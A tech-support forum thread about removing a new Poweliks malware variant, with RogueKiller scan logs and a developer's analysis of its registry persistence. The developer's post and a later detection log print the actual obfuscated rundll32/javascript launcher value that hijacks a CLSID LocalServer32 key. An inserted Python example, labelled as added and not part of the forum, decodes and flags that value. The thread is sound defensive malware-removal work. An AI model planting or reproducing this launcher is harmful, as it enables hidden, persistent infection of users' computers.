Adlice forum
Software feedback => RogueKiller => Topic started by: Powdermnky007 on September 13, 2014, 07:33:33 PM
-
Hi, I have a new variant of poweliks / dllhost com surrogate virus. It installed a new version of gigaclicks, I think it was called webcrawler. I think the CPU had 50+ GB of temp Internet files.
I have removed all the superficial viruses and spyware and am left with this new variant I am unable to find or kill. I've been removing viruses for pay for 10+ years. This is the most advanced, well-written virus I've ever seen.
I was hoping to work with you to help your program remove this new variant and I'm also willing to make a donation to you.
I've already run ccleaner, mbam, superantispyware, roguekiller, spybot, eset, MBR scanners, gmer, combofix, adwremover, jrt. I've done sleuthing with process monitor, process explorer, all my normal tricks, but this is one for the experts. Way over my head. I will get some log files posted for you soon. I'm typing this on the ipad.
-
1st scan log with RogueKiller (after running several other scans first).
RogueKiller V9.2.10.0 [Jul 11 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : [Admin rights]
Mode : Scan -- Date : 09/12/2014 15:16:31
¤¤¤ Bad processes : 2 ¤¤¤
[Proc.Svchost] svchost.exe -- C:\Windows\SysWOW64\svchost.exe
[Tr.Poweliks] dllhost.exe --
¤¤¤ Registry Entries : 32 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> FOUND
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> FOUND
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> FOUND
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> FOUND
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> FOUND
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> FOUND
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.safefinder.com/?p=mKO_AwFzXIpYRak5VLd2-qQdkN5729vVFWxou9ho1IAoH5LYnFv7Ja_9v0r8TquJFYF9qhS3Xfm19_bo2L9xWhvx5KlzRNBqHvWSebEoicZqupluzkeMOQx1wxwQPagjxAqSohT2L2biyurnfowuXgDPHtxkyS9EXXVaL6idWhnuWhfhJFzQOZ6LrTLQlb_r89-cREEfZQ,,&q={searchTerms} -> FOUND
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.safefinder.com/?p=mKO_AwFzXIpYRak5VLd2-qQdkN5729vVFWxou9ho1IAoH5LYnFv7Ja_9v0r8TquJFYF9qhS3Xfm19_bo2L9xWhvx5KlzRNBqHvWSebEoicZqupluzkeMOQx1wxwQPagjxAqSohT2L2biyurnfowuXgDPHtxkyS9EXXVaL6idWhnuWhfhJFzQOZ6LrTLQlb_r89-cREEfZQ,,&q={searchTerms} -> FOUND
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\classes\clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} -> FOUND
¤¤¤ Scheduled tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ HOSTS File : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: NOT LOADED [0xc000036b]) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: +++++
--- User ---
[MBR] 8b7f529e4e506e910378704012a032b3
[BSP] 62239356b31ca9815faf0bbacf458cf0 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 19014 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 39022592 | Size: 457885 MB
User = LL1 ... OK
User = LL2 ... OK
+++++ PhysicalDrive1: +++++
--- User ---
[MBR] 1f89d61a65b5bd72e00aa30170dbe9fd
[BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code
Partition table:
0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 3820 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )
-
These are the results from a scan I did JUST NOW, after ALL my cleaning efforts and several runs of RogueKiller. It still has the dllhost com surrogate thing going on. 22 threads of it active in the task manager right now. I've cleaned all the easy-to-identify viruses off this computer and am now left with the mother of all viruses lol.
RogueKiller V9.2.10.0 [Jul 11 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : [Admin rights]
Mode : Remove -- Date : 09/13/2014 15:14:44
¤¤¤ Bad processes : 2 ¤¤¤
[Suspicious.Path] (SVC) SASDIFSV -- \??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS
[Suspicious.Path] (SVC) SASKUTIL -- \??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS
¤¤¤ Registry Entries : 34 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | DisableRegistryTools : 0 -> NOT SELECTED
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | DisableRegistryTools : 0 -> NOT SELECTED
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> NOT SELECTED
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> NOT SELECTED
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> NOT SELECTED
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> NOT SELECTED
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> NOT SELECTED
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Start Page : -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Start Page : -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
¤¤¤ Scheduled tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ HOSTS File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
¤¤¤ Antirootkit : 0 (Driver: LOADED) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: +++++
--- User ---
[MBR] 8b7f529e4e506e910378704012a032b3
[BSP] 62239356b31ca9815faf0bbacf458cf0 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 19014 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 39022592 | Size: 457885 MB
User = LL1 ... OK
User = LL2 ... OK
+++++ PhysicalDrive1: +++++
--- User ---
[MBR] 3477aeb1e884f96c7d3d5d59049f1b1f
[BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code
Partition table:
0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 15268 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )
============================================
RKreport_DEL_09122014_151650.log - RKreport_DEL_09122014_160623.log - RKreport_DEL_09122014_210551.log - RKreport_SCN_09122014_151631.log
RKreport_SCN_09122014_160500.log - RKreport_SCN_09122014_210510.log - RKreport_SCN_09132014_102907.log
-
hello
Do you know where it resides?
-
No sir. I have NO idea. Nothing can find it. I even booted up into a win 8.1 PE and ran roguekiller with the honey module. Nada.
If possible I would like to work with you, to help your program be able to remove this new variant. Once it gets to this level, it's over my head. Need someone like you to help! Just let me know what you want me to do, or if you have time to pursue. Thank you!
-
Ok, let's start with an OTL log please: http://oldtimer.geekstogo.com/OTL.exe
Leave everything at the defaults and run the scan.
Attach the report here.
-
Powdermnky007 has the same problem I have with this new variant of "Poweliks". It just keeps eating up HD space until Windows reports "Low disk space on c:". All I know is that in the "Auto Start" area in the Registry there is a non-ASCII value that cannot be removed, which contains some weird characters, which is a "Java" script that starts the whole process rolling by calling up rundll32, which invokes a "Powershell" script, and things get worse from there! Malwarebytes reports (2) entries in the registry which it labels as "Poweliks" and said that it removed them, but upon reboot they are there again! I'm going to try whatever it takes to get rid of this thing, so hopefully someone, somewhere, might have some answers as far as getting rid of this infection for good!
-
Worked on the computer all night again tonight... what a waste. Nothing can detect this thing.
Internet Explorer is broken.
Windows Installer is broken.
Entries are disappearing from the start menu.
OTL will not open; I get "Exception EOIeSysError in module OTL.exe at b000584A5. Class not registered." I tried 'run as admin' and even googled the error, but no solutions. I believe whatever libraries it uses to run have become damaged.
Even if I do get this virus off, the computer is trashed. I'm probably going to give it another night or two with you, then reformat.
I used FRST (Farbar Recovery Scan Tool) and found the following entries, which are very suspicious. I attached the log file in its entirety.
2014-09-17 23:34 - 2014-09-12 22:41 - 00013520 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-17 23:34 - 2014-09-12 22:41 - 00013520 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
-
Ok, anyone who can paste any information on this would be useful.
"All I know is that in the "Auto Start" area in the Registry there is a non-ASCII value that cannot be removed, which contains some weird characters, which is a "Java" script that starts the whole process rolling by calling up rundll32, which invokes a "Powershell" script, and things get worse from there!"
Can you paste the content here?
RogueKillerCMD is able to remove that run key by using the removal by index, but detecting the key would be better.
http://www.adlice.com/poweliks-removal-with-roguekiller/
-
Hello
I have some good news :)
I've found a dropper for that new variant, and indeed a few changes:
- No more RUN key.
- No more HKCU clsid payload; now it's overwriting the same clsid, but in HKLM/HKCR. So there's a loss of Windows system data.
- The javascript value has been modified, the content is now obfuscated.
The key is here:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32
* <unicode named subkey>
* default value: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
* a: <encrypted payload>
The original COM server is the file: C:\WINDOWS\system32\wbem\wmiprvse.exe
----------------
Effects:
- At each COM call, instead of having the svchost ComLauncher process call wmiprvse, we call the javascript command, and the infection.
- All COM calls are broken (RogueKiller was hanging on it, but it's now fixed)
- We can't kill the ComLauncher process, just restore the registry key.
I'm building a new version of RogueKiller that fixes it.
-
Wow that's seriously impressive. I have no idea how you figured that out. In my digging last night I found someone else in another forum with the javascript being called from a clsid, just like in your example below.
I did a quick registry search for "javascript:" but no infected keys showed up. I also opened "Autoruns" to check all the start up entries, and again nothing there. BUT if I remember correctly, when I clicked on one of the tabs I got an error. I think it was the WMI tab.
If there is anything you want me to check, post here, run a beta roguekiller, anything, just let me know.
-
RogueKiller new version is online. Please try it.
It can't be in Autoruns, since it's a COM DLL hijack, not a classic autorun entry (a bit like a previous ZeroAccess variant).
-
At work now, I'll be home and able to try the new program in about 10 hours. I'll post here when complete.
Will RogueKiller automatically repair "The original COM server is the file: C:\WINDOWS\system32\wbem\wmiprvse.exe"?
Or is that something I will need to do manually?
-
Nope, it will. On my test VM:
[Tr.Poweliks] HKEY_LOCAL_MACHINE\Software\classes\clsid\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32 | : rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) -> REPLACED (C:\WINDOWS\system32\wbem\wmiprvse.exe)
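As an added example (not Adlice's or RogueKiller's code), the Python below reverses the one-character shift used in the LocalServer32 value from the post above and flags a registry value that has that launcher shape, so the content can be read during triage without executing it. The registry snapshot is constructed from the value quoted in the thread; the function names are this example's own.

```python
"""Added example, not Adlice's or RogueKiller's code: decode and flag the
Poweliks LocalServer32 hijack described in the thread. Sample data is
constructed from the value quoted in the post."""
import re

# Two markers that together identify the launcher the thread describes.
HIJACK_MARKERS = ("rundll32.exe javascript:", "mshtml,RunHTMLApplication")

# Shape of the eval("...".replace(/./g, function(_){...charCodeAt()-N...})) wrapper.
EVAL_SHIFT_RE = re.compile(
    r'eval\("([^"]*)"\.replace\(/\./g,\s*function\(_\)\{return(?:%20|\s)'
    r'String\.fromCharCode\(_\.charCodeAt\(\)-(\d+)\);\}\)\)'
)


def shift_decode(text, shift=1):
    """Undo the per-character shift: each char c becomes chr(ord(c) - shift)."""
    return "".join(chr(ord(c) - shift) for c in text)


def is_localserver32_hijack(value_data):
    """True if a LocalServer32 default value carries the rundll32/javascript launcher."""
    return all(marker in value_data for marker in HIJACK_MARKERS)


def extract_payload(value_data):
    """Return the JScript that eval() would run, or None if the wrapper differs."""
    match = EVAL_SHIFT_RE.search(value_data)
    if not match:
        return None
    return shift_decode(match.group(1), int(match.group(2)))


def triage(entries):
    """entries: iterable of (key_path, default_value). Returns a list of findings."""
    findings = []
    for key, data in entries:
        if not key.lower().endswith("\\localserver32"):
            continue
        if is_localserver32_hijack(data):
            findings.append({"key": key, "decoded": extract_payload(data)})
    return findings


# Obfuscated string copied from the post; the surrounding value is rebuilt around it.
OBFUSCATED = ("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)"
              "(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1."
              "::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*")
HIJACKED_VALUE = (
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";eval("' + OBFUSCATED
    + '".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))'
)
CLSID_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID"
             r"\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32")

# Constructed snapshot: the legitimate server path beside the hijacked value.
SAMPLE_ENTRIES = [
    (CLSID_KEY, r"C:\WINDOWS\system32\wbem\wmiprvse.exe"),
    (CLSID_KEY, HIJACKED_VALUE),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_ENTRIES):
        print(finding["key"])
        print("  decoded launcher:", finding["decoded"])
```

The decoded string explains the "a" value the post lists as the encrypted payload: the launcher reads HKCR\clsid\{73e709ea-...}\localserver32\a through WScript.Shell and writes it into a jscript.encode script block, so restoring the LocalServer32 default value alone leaves that payload value behind for manual cleanup.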
-
Still didn't find anything on mine. I'm wondering if the Poweliks is gone and now my system is just trashed, should I just reformat?
-
Can you look manually to see if you see the key above in regedit?
-
I did, there was no weird java key there. Just the normal C:\WINDOWS\system32\wbem\wmiprvse.exe
-
Ok, I think something fixed it before.
Maybe MBAM?